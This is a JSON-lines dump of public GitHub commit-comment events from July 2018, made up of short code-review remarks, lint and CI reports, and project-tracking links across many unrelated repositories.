{"id":"7998806451","type":"CommitCommentEvent","actor":{"login":"JacoKoster"},"repo":{"name":"philhawksworth/html-time"},"payload":{"comment":{"id":29789012,"position":null,"line":null,"path":null,"commit_id":"4d262fd0ff17cbf7778756ff30a60d8f99721cfe","created_at":"2018-07-21T15:52:09Z","updated_at":"2018-07-21T15:52:09Z","author_association":"CONTRIBUTOR","body":"Ah, yes, this makes more sense. I was missing that you were getting the timezones from the json ;-)"}},"created_at":"2018-07-21T15:52:09Z"}
{"id":"7998807046","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789014,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:52:35Z","updated_at":"2018-07-21T15:52:35Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:52:35Z"}
{"id":"7998811338","type":"CommitCommentEvent","actor":{"login":"husuzttemu"},"repo":{"name":"husuzttemu/python-examples"},"payload":{"comment":{"id":29789021,"position":null,"line":null,"path":null,"commit_id":"1278ce777f6b5562d971dbd76597379665d058d8","created_at":"2018-07-21T15:55:45Z","updated_at":"2018-07-21T15:55:45Z","author_association":"OWNER","body":"wfefwe"}},"created_at":"2018-07-21T15:55:45Z"}
{"id":"7998813120","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789023,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T15:57:07Z","updated_at":"2018-07-21T15:57:07Z","author_association":"OWNER","body":"Catching just Exception is bad, because it might catch stuff that you dont want to catch (common examples being IndexOutOfBoundsException or even a OutOfMemoryException). You want to specifically look at that what exception type could be thrown and then adress those individually. It allows for easier maintenance, cleaner error handling and better readability. The thing ItemExchange is bad for the same reasons.\r\n\r\nDoing the same thign for multiple types of exceptions is fine, you can group them like so:\r\n\r\n```\r\ntry { \r\n  ...\r\n} catch (IOException | SQLException ex) { \r\n  ...\r\n}\r\n\r\n```"}},"created_at":"2018-07-21T15:57:07Z"}
{"id":"7998814592","type":"CommitCommentEvent","actor":{"login":"nabeelalis"},"repo":{"name":"Muneeb316/NodeJS"},"payload":{"comment":{"id":29789025,"position":16,"line":16,"path":"Restful-Api/index.js","commit_id":"5e0d754860a12c8cb07daaa46f6fbc0fee42967f","created_at":"2018-07-21T15:58:12Z","updated_at":"2018-07-21T15:58:12Z","author_association":"COLLABORATOR","body":"Separate the routes and controller functions."}},"created_at":"2018-07-21T15:58:12Z"}
{"id":"7998817933","type":"CommitCommentEvent","actor":{"login":"WilfredoAlarcon"},"repo":{"name":"WilfredoAlarcon/Fedesoft"},"payload":{"comment":{"id":29789035,"position":null,"line":null,"path":null,"commit_id":"4275960e28a6ab28f35ed9f79a26c8a0efcadc9d","created_at":"2018-07-21T16:00:31Z","updated_at":"2018-07-21T16:00:31Z","author_association":"OWNER","body":"- [ ] Create First Sketck HV"}},"created_at":"2018-07-21T16:00:31Z"}
{"id":"7998819137","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789038,"position":20,"line":20,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T16:01:22Z","updated_at":"2018-07-21T16:01:22Z","author_association":"OWNER","body":"It depends on the context. If null is a valid parameter that just returns 0, then `Validate.notNull(table, \"Table cannot be null!\");` would not be ideal as it would throw an exception. If it's an illegal parameter then that's fine though. You're right though, this kinda stuff is a bit of a personal taste."}},"created_at":"2018-07-21T16:01:22Z"}
{"id":"7998819215","type":"CommitCommentEvent","actor":{"login":"sigmavirus24"},"repo":{"name":"heroku/django-heroku"},"payload":{"comment":{"id":29789039,"position":null,"line":null,"path":null,"commit_id":"1ed16ab6dff15ab4abe40ae9ae8216695d669c5e","created_at":"2018-07-21T16:01:25Z","updated_at":"2018-07-21T16:01:25Z","author_association":"CONTRIBUTOR","body":"Django-Heroku only supports Python 3 and Django 2.0\n\nOn Sat, Jul 21, 2018 at 10:46 Hemanrt Meena <notifications@github.com>\nwrote:\n\n> SyntaxError: invalid syntax due to * as params in settings function for\n> python2.7 windows machine\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/heroku/django-heroku/commit/1ed16ab6dff15ab4abe40ae9ae8216695d669c5e#commitcomment-29789001>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOsvnihRjT0-TXG8ZBzFeyg7PsjdyZaks5uI0zegaJpZM4VZqzn>\n> .\n>\n-- \nIan Stapleton Cordasco\nSenior Software Engineer @ Heroku Connect\nSent from my phone. Please excuse my brevity\n"}},"created_at":"2018-07-21T16:01:25Z"}
{"id":"7998819654","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789041,"position":24,"line":24,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T16:01:43Z","updated_at":"2018-07-21T16:01:43Z","author_association":"OWNER","body":"Nah, just use your thing if its from Mojang code and works"}},"created_at":"2018-07-21T16:01:43Z"}
{"id":"7998820015","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789042,"position":110,"line":110,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T16:01:54Z","updated_at":"2018-07-21T16:01:54Z","author_association":"OWNER","body":"Yeah"}},"created_at":"2018-07-21T16:01:54Z"}
{"id":"7998820045","type":"CommitCommentEvent","actor":{"login":"AdityaTD"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29789043,"position":18,"line":18,"path":"inhibitors/requireMusic.js","commit_id":"d7f6e3400061309e661534c7dfa6beac5bdac81a","created_at":"2018-07-21T16:01:56Z","updated_at":"2018-07-21T16:01:56Z","author_association":"OWNER","body":"How do you expect the bot to be connected to VC on `play` command?"}},"created_at":"2018-07-21T16:01:56Z"}
{"id":"7998820524","type":"CommitCommentEvent","actor":{"login":"AdityaTD"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29789044,"position":19,"line":19,"path":"inhibitors/requireMusic.js","commit_id":"d7f6e3400061309e661534c7dfa6beac5bdac81a","created_at":"2018-07-21T16:02:16Z","updated_at":"2018-07-21T16:02:16Z","author_association":"OWNER","body":"Same here..."}},"created_at":"2018-07-21T16:02:16Z"}
{"id":"7998820718","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29789045,"position":18,"line":18,"path":"inhibitors/requireMusic.js","commit_id":"d7f6e3400061309e661534c7dfa6beac5bdac81a","created_at":"2018-07-21T16:02:26Z","updated_at":"2018-07-21T16:02:26Z","author_association":"COLLABORATOR","body":"the play command isnt meant to have requireMusic true 🤦‍♀️ "}},"created_at":"2018-07-21T16:02:26Z"}
{"id":"7998821394","type":"CommitCommentEvent","actor":{"login":"maslenitsa93"},"repo":{"name":"GolosChain/golos"},"payload":{"comment":{"id":29789049,"position":null,"line":null,"path":null,"commit_id":"a1322a7b6653491e6bf7aec17b87f3fa2bcc007a","created_at":"2018-07-21T16:02:58Z","updated_at":"2018-07-21T16:02:58Z","author_association":"NONE","body":"We do not using `bool_switch `(use `value<bool>` instead) in config options files since this commit. "}},"created_at":"2018-07-21T16:02:58Z"}
{"id":"7998821553","type":"CommitCommentEvent","actor":{"login":"AdityaTD"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29789051,"position":18,"line":18,"path":"inhibitors/requireMusic.js","commit_id":"d7f6e3400061309e661534c7dfa6beac5bdac81a","created_at":"2018-07-21T16:03:06Z","updated_at":"2018-07-21T16:03:06Z","author_association":"OWNER","body":"But then there goes `isDJ` check then, would need to add a new property for it now."}},"created_at":"2018-07-21T16:03:06Z"}
{"id":"7998823074","type":"CommitCommentEvent","actor":{"login":"vibssh"},"repo":{"name":"vibssh/ChoreApp"},"payload":{"comment":{"id":29789054,"position":null,"line":null,"path":null,"commit_id":"faa8d4426b5e5041a552ec712f54c4b6d4a8fe21","created_at":"2018-07-21T16:04:16Z","updated_at":"2018-07-21T16:04:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Angular Setup](https://trello.com/c/zpGCzNBY/2-angular-setup)"}},"created_at":"2018-07-21T16:04:16Z"}
{"id":"7998823388","type":"CommitCommentEvent","actor":{"login":"vibssh"},"repo":{"name":"vibssh/ChoreApp"},"payload":{"comment":{"id":29789055,"position":null,"line":null,"path":null,"commit_id":"faa8d4426b5e5041a552ec712f54c4b6d4a8fe21","created_at":"2018-07-21T16:04:34Z","updated_at":"2018-07-21T16:04:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup Repository](https://trello.com/c/JqHHKZK4/10-setup-repository)"}},"created_at":"2018-07-21T16:04:34Z"}
{"id":"7998824352","type":"CommitCommentEvent","actor":{"login":"hemcodemode"},"repo":{"name":"heroku/django-heroku"},"payload":{"comment":{"id":29789059,"position":null,"line":null,"path":null,"commit_id":"1ed16ab6dff15ab4abe40ae9ae8216695d669c5e","created_at":"2018-07-21T16:05:19Z","updated_at":"2018-07-21T16:05:19Z","author_association":"NONE","body":"Ok, thanks. Is there any tweak we can do for python2.7 ?"}},"created_at":"2018-07-21T16:05:19Z"}
{"id":"7998825549","type":"CommitCommentEvent","actor":{"login":"vibssh"},"repo":{"name":"vibssh/ChoreApp"},"payload":{"comment":{"id":29789061,"position":null,"line":null,"path":null,"commit_id":"2254bdb765c64d1dd19cf380699bb02d7a404f05","created_at":"2018-07-21T16:06:16Z","updated_at":"2018-07-21T16:06:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Source Image and Icons](https://trello.com/c/e14DmAfe/9-source-image-and-icons)"}},"created_at":"2018-07-21T16:06:16Z"}
{"id":"7998825604","type":"CommitCommentEvent","actor":{"login":"spapastamkou"},"repo":{"name":"programminghistorian/jekyll"},"payload":{"comment":{"id":29789062,"position":null,"line":null,"path":null,"commit_id":"b5d04bd37120b008259aec13c1f6cbd29ece2f11","created_at":"2018-07-21T16:06:19Z","updated_at":"2018-07-21T16:06:19Z","author_association":"CONTRIBUTOR","body":"@mdlincoln in the list that starts the file I only changed the title. Should I do smth for the \"redirect_from\" part? In the Spanish files it is replaced by \"original\".  Please confirm and I will make the changes if needed. cc @mpuren (as it concerns all files of the directory)"}},"created_at":"2018-07-21T16:06:19Z"}
{"id":"7998825665","type":"CommitCommentEvent","actor":{"login":"shuttle1987"},"repo":{"name":"persephone-tools/persephone"},"payload":{"comment":{"id":29789063,"position":null,"line":null,"path":null,"commit_id":"8862bc2ddefbd6330021e282dd176752e06aa8a8","created_at":"2018-07-21T16:06:22Z","updated_at":"2018-07-21T16:06:22Z","author_association":"MEMBER","body":"This would be better in the `fixed` section"}},"created_at":"2018-07-21T16:06:22Z"}
{"id":"7998825766","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"dotty-staging/dotty"},"payload":{"comment":{"id":29789064,"position":11,"line":1053,"path":"compiler/src/dotty/tools/dotc/ast/tpd.scala","commit_id":"6c59cfbd35d8a09ee99fc23c80a0a49fe8565876","created_at":"2018-07-21T16:06:28Z","updated_at":"2018-07-21T16:06:28Z","author_association":"NONE","body":"stray `>`"}},"created_at":"2018-07-21T16:06:28Z"}
{"id":"7998826519","type":"CommitCommentEvent","actor":{"login":"marlesque"},"repo":{"name":"marlesque/WeightAssignmentToStocks2"},"payload":{"comment":{"id":29789065,"position":null,"line":null,"path":null,"commit_id":"8f2936bb32059b2c705b11f136e5fc71ef927724","created_at":"2018-07-21T16:07:04Z","updated_at":"2018-07-21T16:07:04Z","author_association":"OWNER","body":"R codes consist of two components: equal weighting vs Marknowitz method of weight assignment"}},"created_at":"2018-07-21T16:07:04Z"}
{"id":"7998828203","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"dotty-staging/dotty"},"payload":{"comment":{"id":29789067,"position":6,"line":312,"path":"compiler/src/dotty/tools/dotc/typer/PrepareTransparent.scala","commit_id":"6c59cfbd35d8a09ee99fc23c80a0a49fe8565876","created_at":"2018-07-21T16:08:20Z","updated_at":"2018-07-21T16:08:20Z","author_association":"NONE","body":"This should also be done for accessorAtPos above."}},"created_at":"2018-07-21T16:08:20Z"}
{"id":"7998828860","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789068,"position":null,"line":null,"path":null,"commit_id":"c94051a32260f43d5f70d87d514440a803bfd2b9","created_at":"2018-07-21T16:08:50Z","updated_at":"2018-07-21T16:08:50Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.35%25-green.png)</a>\n"}},"created_at":"2018-07-21T16:08:50Z"}
{"id":"7998829997","type":"CommitCommentEvent","actor":{"login":"CaMer0n"},"repo":{"name":"e107inc/e107-test"},"payload":{"comment":{"id":29789069,"position":null,"line":null,"path":null,"commit_id":"249be2979c9a32d31f63e211fe232a6929de1b80","created_at":"2018-07-21T16:09:43Z","updated_at":"2018-07-21T16:09:43Z","author_association":"MEMBER","body":"Thank you! I guess that error is occurring because the media-category is not being removed when 'banner' is uninstalled, and then it attempts to add it again during install. "}},"created_at":"2018-07-21T16:09:43Z"}
{"id":"7998830587","type":"CommitCommentEvent","actor":{"login":"josefs"},"repo":{"name":"josefs/Gradualizer"},"payload":{"comment":{"id":29789071,"position":6,"line":97,"path":"test/typechecker_tests.erl","commit_id":"b5c8d53ed1626d4f73e564dd705fecf4f279638c","created_at":"2018-07-21T16:10:09Z","updated_at":"2018-07-21T16:10:09Z","author_association":"OWNER","body":"Uhm, yeah..."}},"created_at":"2018-07-21T16:10:09Z"}
{"id":"7998830668","type":"CommitCommentEvent","actor":{"login":"pevik"},"repo":{"name":"iputils/iputils"},"payload":{"comment":{"id":29789072,"position":null,"line":null,"path":null,"commit_id":"99f67db03d12b60f37b3af91f809f9f72bb1d29b","created_at":"2018-07-21T16:10:12Z","updated_at":"2018-07-21T16:10:12Z","author_association":"CONTRIBUTOR","body":"@ennui93 Thanks a lot for a report. Fixed in PR https://github.com/iputils/iputils/pull/138, can you please test it? BTW Did you found it using Gentoo?"}},"created_at":"2018-07-21T16:10:12Z"}
{"id":"7998831146","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29789073,"position":23,"line":23,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-21T16:10:28Z","updated_at":"2018-07-21T16:10:28Z","author_association":"OWNER","body":"I was trying to avoid that kind of thing. It's a list. It has an order. The IDs are not something a user of this library should care about or know. The only thing that cares about the ids is placement itself, which creates them as a side effect of the ordering.\r\n\r\nWhich I agree, is weird. But I think it is important the ids not be present here."}},"created_at":"2018-07-21T16:10:28Z"}
{"id":"7998831768","type":"CommitCommentEvent","actor":{"login":"Deltik"},"repo":{"name":"e107inc/e107-test"},"payload":{"comment":{"id":29789074,"position":null,"line":null,"path":null,"commit_id":"249be2979c9a32d31f63e211fe232a6929de1b80","created_at":"2018-07-21T16:10:54Z","updated_at":"2018-07-21T16:10:54Z","author_association":"COLLABORATOR","body":"@CaMer0n: I've made more progress.  Of the 13 failing tests before, I've got 12 passing now.  I think I'm pretty close to getting all tests passing.  I'll update when I've figured it all out."}},"created_at":"2018-07-21T16:10:54Z"}
{"id":"7998834151","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29789079,"position":28,"line":28,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-21T16:12:36Z","updated_at":"2018-07-21T16:12:36Z","author_association":"OWNER","body":"Mostly because I was trying to keep separate in my mind and I wrote this code first before doing the changes in placement itself where I discovered that `STANDARD` (or was it `STANDARDS`) was used a fair bit.\r\n\r\nSo yeah, could change if that seemed right."}},"created_at":"2018-07-21T16:12:36Z"}
{"id":"7998834176","type":"CommitCommentEvent","actor":{"login":"CaMer0n"},"repo":{"name":"e107inc/e107-test"},"payload":{"comment":{"id":29789080,"position":null,"line":null,"path":null,"commit_id":"249be2979c9a32d31f63e211fe232a6929de1b80","created_at":"2018-07-21T16:12:37Z","updated_at":"2018-07-21T16:12:37Z","author_association":"MEMBER","body":"Excellent! :+1:  Thank you!!!"}},"created_at":"2018-07-21T16:12:37Z"}
{"id":"7998836631","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29789083,"position":21,"line":48,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-21T16:14:27Z","updated_at":"2018-07-21T16:14:27Z","author_association":"OWNER","body":"I didn't consider that because I was hoping to be able to just import the top level and be done with it and had not yet added `CUSTOM_NAMESPACE` or thought about `normalize_name`.\r\n\r\nWith those in place, yeah, it makes some sense."}},"created_at":"2018-07-21T16:14:27Z"}
{"id":"7998837634","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789085,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T16:15:09Z","updated_at":"2018-07-21T16:15:09Z","author_association":"NONE","body":"I have looked deeper at your code and i have one place where we have a potentially a problem.\r\nIn line 515 if the given move is legal. But one requirement for calling the legal function is that the move is at least pseudo legal (`/// Position::legal() tests whether a pseudo-legal move is legal`). There are several assert in legal to check this which would in debug mode quit the engine. Because the checked move is from the TT it could come from a wrong position and so also not even pseudo legal. So this should be checked  before legal check:\r\n`||  !rootPos.pseudo_legal(playMove)`\r\n\r\nIn general with crashes its good to compile with debug mode=on and run bench to see if some assert is triggered.\r\n\r\nIn the case you haven't used the debug mode here a how to:\r\n1. Set in the file Makefile the line debug=no to debug=yes\r\n2. remove all compiles with 'make clean'. This is important else the binaries would not be recompiled despite the makefile changed.\r\n3. do your normal build"}},"created_at":"2018-07-21T16:15:09Z"}
{"id":"7998837797","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29789088,"position":26,"line":53,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-21T16:15:15Z","updated_at":"2018-07-21T16:15:15Z","author_association":"OWNER","body":"Do we need that method outside of nova, and do we want to promulgate the idea that one should be normalizing the names? I think you should fail to create a name when talking to placement, not normalize it first."}},"created_at":"2018-07-21T16:15:15Z"}
{"id":"7998839191","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29789089,"position":null,"line":null,"path":null,"commit_id":"750177b920ea80135af510a85561ae2e80d3eddf","created_at":"2018-07-21T16:16:17Z","updated_at":"2018-07-21T16:16:17Z","author_association":"OWNER","body":"Yeah, I tried to figure out how much is lost by losing the deprecation framework and I couldn't figure it out.\r\n\r\nThe cost of having the framework is high, and I don't really see the need to know the deprecation programmatically. I'd rather read something."}},"created_at":"2018-07-21T16:16:17Z"}
{"id":"7998845607","type":"CommitCommentEvent","actor":{"login":"raportoh"},"repo":{"name":"raportoh/DelphiTeste"},"payload":{"comment":{"id":29789096,"position":null,"line":null,"path":null,"commit_id":"805037be751bc5d907aac3d3aa2539e13e66fc2a","created_at":"2018-07-21T16:20:48Z","updated_at":"2018-07-21T16:20:48Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-21T16:20:48Z"}
{"id":"7998845766","type":"CommitCommentEvent","actor":{"login":"raportoh"},"repo":{"name":"raportoh/DelphiTeste"},"payload":{"comment":{"id":29789097,"position":null,"line":null,"path":null,"commit_id":"805037be751bc5d907aac3d3aa2539e13e66fc2a","created_at":"2018-07-21T16:20:56Z","updated_at":"2018-07-21T16:20:56Z","author_association":"OWNER","body":"t."}},"created_at":"2018-07-21T16:20:56Z"}
{"id":"7998858743","type":"CommitCommentEvent","actor":{"login":"hdroncon"},"repo":{"name":"hdroncon/autonomous_vehicle"},"payload":{"comment":{"id":29789122,"position":null,"line":null,"path":null,"commit_id":"9983dc6b4d1482d453ae4d55e0fb890ef37baf93","created_at":"2018-07-21T16:30:41Z","updated_at":"2018-07-21T16:30:41Z","author_association":"OWNER","body":"Main document (in portuguese)"}},"created_at":"2018-07-21T16:30:41Z"}
{"id":"7998858786","type":"CommitCommentEvent","actor":{"login":"Himself65"},"repo":{"name":"Himself65/Profile"},"payload":{"comment":{"id":29789123,"position":5,"line":27,"path":"index.html","commit_id":"20a7736d312d777cefd3a10361caac3c67b7b35f","created_at":"2018-07-21T16:30:43Z","updated_at":"2018-07-21T16:30:43Z","author_association":"OWNER","body":"不管"}},"created_at":"2018-07-21T16:30:43Z"}
{"id":"7998860685","type":"CommitCommentEvent","actor":{"login":"DragonRydrz"},"repo":{"name":"Lambda-School-Labs/CS8-payme"},"payload":{"comment":{"id":29789125,"position":null,"line":null,"path":null,"commit_id":"0932cf372906bd01157f73178fab28a893a5d5d4","created_at":"2018-07-21T16:32:10Z","updated_at":"2018-07-21T16:32:10Z","author_association":"COLLABORATOR","body":"${token} is incorrect. My PR fixes this issue."}},"created_at":"2018-07-21T16:32:10Z"}
{"id":"7998860978","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29789126,"position":14,"line":28,"path":"CHANGELOG.en-US.md","commit_id":"8c7dfe45c6f71b33a3cf698d8e48746cb7db9f37","created_at":"2018-07-21T16:32:26Z","updated_at":"2018-07-21T16:32:26Z","author_association":"MEMBER","body":"提一下 menu 的 feature 被 revert 了？"}},"created_at":"2018-07-21T16:32:26Z"}
{"id":"7998861854","type":"CommitCommentEvent","actor":{"login":"chomats"},"repo":{"name":"geneweb/geneweb"},"payload":{"comment":{"id":29789127,"position":null,"line":null,"path":null,"commit_id":"a1f3cde60b0b7cde93fb5c52f08fe96940598d06","created_at":"2018-07-21T16:33:12Z","updated_at":"2018-07-21T16:33:12Z","author_association":"NONE","body":"Hello, I propose to fix the compilation problem when we chose --api."}},"created_at":"2018-07-21T16:33:12Z"}
{"id":"7998863318","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"raphw/byte-buddy"},"payload":{"comment":{"id":29789128,"position":5,"line":30,"path":"byte-buddy-benchmark/pom.xml","commit_id":"fcd92dd51ad1de19569677912def1c56b41b6766","created_at":"2018-07-21T16:34:23Z","updated_at":"2018-07-21T16:34:23Z","author_association":"NONE","body":"@raphw is there a reason? Did you have issues with the new version?"}},"created_at":"2018-07-21T16:34:23Z"}
{"id":"7998863590","type":"CommitCommentEvent","actor":{"login":"vargaz"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29789129,"position":11,"line":101,"path":"mono/utils/mono-signal-handler.h","commit_id":"bcd4e46a42912d29ccabd3da7bcae43bd8347e74","created_at":"2018-07-21T16:34:34Z","updated_at":"2018-07-21T16:34:34Z","author_association":"MEMBER","body":"This should go to utils/mono-compiler.h."}},"created_at":"2018-07-21T16:34:34Z"}
{"id":"7998864695","type":"CommitCommentEvent","actor":{"login":"PKlucha"},"repo":{"name":"PKlucha/NeuralNetworkDoodleClassifierJS"},"payload":{"comment":{"id":29789130,"position":null,"line":null,"path":null,"commit_id":"eecf9b31e1782cc84ca1ee6ecab5cecb6a886d43","created_at":"2018-07-21T16:35:24Z","updated_at":"2018-07-21T16:35:24Z","author_association":"OWNER","body":"Everything seems to be working fine."}},"created_at":"2018-07-21T16:35:24Z"}
{"id":"7998865013","type":"CommitCommentEvent","actor":{"login":"hieplpvip"},"repo":{"name":"hieplpvip/ASUS-ZENBOOK-UX410-HACKINTOSH"},"payload":{"comment":{"id":29789132,"position":null,"line":null,"path":null,"commit_id":"c2841ecaa39ee73495a6d8bb88aa0e9aaa2d0e74","created_at":"2018-07-21T16:35:38Z","updated_at":"2018-07-21T16:35:38Z","author_association":"OWNER","body":"See [this](https://github.com/hieplpvip/VoodooI2C/tree/native). This kext fake a Magic Trackpad 2, so the gestures would be better, at least on my laptop.\r\nSince @alexandred hasn't updated his kexts to support 10.14, this kext doesn't support 10.14 now.\r\nBut if you want, please open a new issue, and I can make new kexts for your based on [this](https://github.com/alexandred/VoodooI2C/issues/70)."}},"created_at":"2018-07-21T16:35:38Z"}
{"id":"7998865719","type":"CommitCommentEvent","actor":{"login":"deary4"},"repo":{"name":"deary4/homemy"},"payload":{"comment":{"id":29789133,"position":null,"line":null,"path":null,"commit_id":"c33ffb574924f17b89b3c8cc73d9c48ba2bc4f73","created_at":"2018-07-21T16:36:11Z","updated_at":"2018-07-21T16:36:11Z","author_association":"OWNER","body":"xxx"}},"created_at":"2018-07-21T16:36:11Z"}
{"id":"7998866224","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29789134,"position":16,"line":21,"path":"lesson1/triangle.rb","commit_id":"f0f955f8786d12180dac8dca8cbb3e882f8e0b9c","created_at":"2018-07-21T16:36:35Z","updated_at":"2018-07-21T16:36:35Z","author_association":"NONE","body":"в ТЗ: \"Также, если треугольник является при этом равнобедренным\"\r\nобрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный\r\nа у тебя она здесь проверяется сама по себе\r\nпричем она без проверки на прямоугольность будет работать неверно, потому что ты в 15 строке проверяешь равнобедренность именно для прямоугольного, для обычного такая проверка не отработает"}},"created_at":"2018-07-21T16:36:35Z"}
{"id":"7998869750","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29789138,"position":18,"line":23,"path":"lesson1/triangle.rb","commit_id":"f0f955f8786d12180dac8dca8cbb3e882f8e0b9c","created_at":"2018-07-21T16:39:28Z","updated_at":"2018-07-21T16:39:28Z","author_association":"NONE","body":"хорошо бы добавить сообщение на случай, когда треугольник не прямоугольный, не равнобедренный, не равносторонний, но это на твое усмотрение, в ТЗ нет такого требования )"}},"created_at":"2018-07-21T16:39:28Z"}
{"id":"7998870985","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29789139,"position":1,"line":10,"path":"lesson1/triangle.rb","commit_id":"f0f955f8786d12180dac8dca8cbb3e882f8e0b9c","created_at":"2018-07-21T16:40:23Z","updated_at":"2018-07-21T16:40:23Z","author_association":"NONE","body":"я оставлял [вот тут](https://github.com/kristalls/thinkneticaRoR/commit/1c58011bc6f5c532180f297b53e56a36b7b2b1dc#diff-11560253e84fc3f23a29f15964b3be3e) замечания по строкам 4 - 10, но почему-то они не исправлены"}},"created_at":"2018-07-21T16:40:23Z"}
{"id":"7998871917","type":"CommitCommentEvent","actor":{"login":"rohilthopu"},"repo":{"name":"nachoapps/rpad-cogs-utils"},"payload":{"comment":{"id":29789140,"position":null,"line":null,"path":null,"commit_id":"e32c30935e28f2c6e22b92a8a7c4b62061ea95aa","created_at":"2018-07-21T16:41:07Z","updated_at":"2018-07-21T16:41:07Z","author_association":"CONTRIBUTOR","body":"I can see why this broke. I'll look into my keys again."}},"created_at":"2018-07-21T16:41:07Z"}
